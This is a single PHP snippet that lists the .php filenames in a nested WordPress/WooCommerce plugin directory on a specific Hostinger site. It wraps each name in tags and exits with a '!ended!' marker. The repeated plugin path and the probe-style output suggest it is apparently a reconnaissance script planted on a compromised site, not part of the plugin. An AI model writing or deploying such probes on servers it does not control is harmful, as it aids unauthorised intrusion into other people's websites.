<?php foreach (glob("/home/u362014288/domains/dimgrey-stingray-627452.hostingersite.com/public_html/wp-content/plugins/woocommerce/src/Blocks/Integrations/wp-content/plugins/woocommerce/src/Admin/API/Reports/Customers/Stats/*.php") as $filename) { echo "<f>".basename($filename)."</f>"; } die('!ended!');